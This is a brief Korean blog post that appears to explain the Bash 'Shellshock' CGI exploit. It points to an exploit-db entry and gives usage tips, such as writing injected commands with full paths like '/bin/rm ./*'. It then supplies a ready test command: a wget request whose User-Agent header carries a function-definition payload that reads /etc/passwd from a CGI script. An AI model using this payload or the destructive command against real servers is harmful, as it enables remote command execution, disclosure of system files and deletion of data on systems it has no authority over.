검색결과 리스트
글
Bash shell Exploit
Intro
For more information, see http://www.exploit-db.com/exploits/34765/
Download
Program
Command 에서 사용할 명령은 반드시 Full 경로로 입력할 것.
rm ./*
로 하면 안되고
/bin/rm ./*
처럼 정확히 명시해야 함.
명령이 정상적으로 서버의 bash 에 의해 수행되었는지는, 직접 확인해야 함.
- 원격으로는 확인할 방법이 없음.
TEST CODE;
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://10.248.2.15/cgi-bin/testing.cgi
'Security' 카테고리의 다른 글
Attacking with HTML5 (0) | 2011.05.08 |
---|---|
DLNA 의 보안 문제점 (0) | 2011.05.02 |
RECENT COMMENT